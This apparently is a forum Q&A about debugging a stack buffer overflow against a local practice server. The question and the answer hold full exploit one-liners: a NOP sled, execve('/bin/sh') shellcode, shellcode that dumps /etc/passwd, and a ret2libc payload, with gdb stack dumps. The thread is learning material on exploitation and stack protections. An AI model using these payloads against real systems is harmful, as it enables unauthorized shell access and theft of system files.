Buffer overflow on server

Question

I have a server (for reference: pastebin.com/ghJX69uH) that I can netcat to and it will ask to input a message.

I know it is vulnerable to buffer overflow, but I can't seem to get the shellcode to run. I have successfully pointed the return address back to the NOP slide and it hits the /bin/sh but it does not spawn a shell. Here is my code:

echo "`python -c 'print "\x90"*65517 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  + "\xac\xf3\xfe\xbf"*10 + "\n"'`" | nc 127.0.0.1 1111

It's a simple buffer overflow with [NOP SLIDE | SHELLCODE (spawn shell /bin/sh) | return address]

The first image shows that the return address is 0xbffef3ac which goes to NOP sled, so all is OK! The second image shows a SIGSEGV with no shell, nothing happens.

What's going on here? I had a look at ebp and it showed something weird: my \x90 followed by what should be my shellcode, but looking differently. Any insights on what could be wrong or how to go about this?

0xbffef42c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffef43c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffef44c: 0x90909090  0x50c03190  0x732f2f68  0x622f6868
0xbffef45c: 0xe3896e69  0xbffef468  0x00000000  0x6e69622f
0xbffef46c: 0x68732f2f  0x00000000  0xbffef3ac  0xbffef3ac
0xbffef47c: 0xbffef3ac  0xbffef3ac  0xbffef3ac  0xbffef3ac
0xbffef48c: 0xbffef3ac  0x00000000  0x00000000  0x00000000
0xbffef49c: 0x00000000  0x00000000  0x00000000  0x00000000

Edit: Format of code is from numberphile, shellcode is from http://shell-storm.org/shellcode/files/shellcode-827.php, which I ran and spawns a shell. I tried adding padding (I put A's) between shellcode and return address, but something strange happens again:

New code: echo "`python -c 'print "\x90"*65490 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  + "A"*27 + "\xac\xf4\xfe\xbf" + "\n"'`" | nc 127.0.0.1 1129


0xbffef42c: 0x90909090  0x90909090  0x90909090  0xc0319090
0xbffef43c: 0x2f2f6850  0x2f686873  0x896e6962  0x895350e3
0xbffef44c: 0xcd0bb0e1  0x41414180  0x41414141  0x41414141
0xbffef45c: 0x41414141  0x41414141  0x41414141  0x00000001
0xbffef46c: 0xbffef4ac  0x08049000  0x00000004  0xbffff4a4
0xbffef47c: 0xbffff490  0xbffff48c  0x00000004  0x00000000
0xbffef48c: 0x00000000  0x00000000  0x00000000  0x00000000
0xbffef49c: 0x00000000  0x00000000  0x00000000  0x00000000
0xbffef4ac: 0x00000000  0x00000000  0x00000000  0x0000000

Edit: So i managed to successfully print all of the etc/passwd, but not sure why the /bin/sh shellcode doesnt work

Works: /etc/passwd

echo "`python -c 'print "\x90"*65478+"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80"  +"AAAA\x9c\xf3\xfe\xbf\x9c\xf3\xfe\xbf" + "\n"'`" | nc 127.0.0.1 2010

Doesnt't work: /bin/sh

echo "`python -c 'print "\x90"*65513 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "AAAA\x9c\xf3\xfe\xbf\x9c\xf3\xfe\xbf\x9c" + "\n"'`" | nc 127.0.0.1 3003

Answer 1

We have two major stack protection for buffer overflows:

• Stack canaries
• Non-executable stack

You land on nopsled but, you get segmentation fault. Because your operating system marked program stack as non-executable and processor raises the exception when program counter addresses that segment. But, even we have an executable stack (for GCC use -z execstack) your program crashes:

I changed shellcode to read /etc/passwd, it works until another SIGSEGV. It is not relevant why your previous shellcode doesn't work, it is a practical problem.

For another scenario:

How can we get around non-executable stack? The most common way is a method called ret2libc (return to libc) using system(const char *). But, we will use _exit(int) for simplicity. For our new attack, I compiled it with non-executable stack option and send the same stream.

$ nc localhost 1337 < exp.loit

Let's look our stack:

We can't understand which part of your input overflows where and we need that to pass the argument(s). I tried a different payload to find what goes where:

python -c 'print "\x90"*65482 + "\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80"  + "\x90"*12 + "\xac\xf3\xfe\xbf" +"\x00\x11\x22\x33"*2 + "\n"' > exp.loit

We get:

We just need _exit address

gdb-peda$ p &_exit
$1 = (<text variable, no debug info> *) 0xb7ec6f24 <_exit>

Now we are ready to execute our exploit:

python -c 'print "\x90"*65482 + "\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80"  + "\x90"*12 + "\x24\x6f\xec\xb7" +"\x01\x00\x00\x00"*2 + "\n"' > exp.loit

Basically ret2libc is that.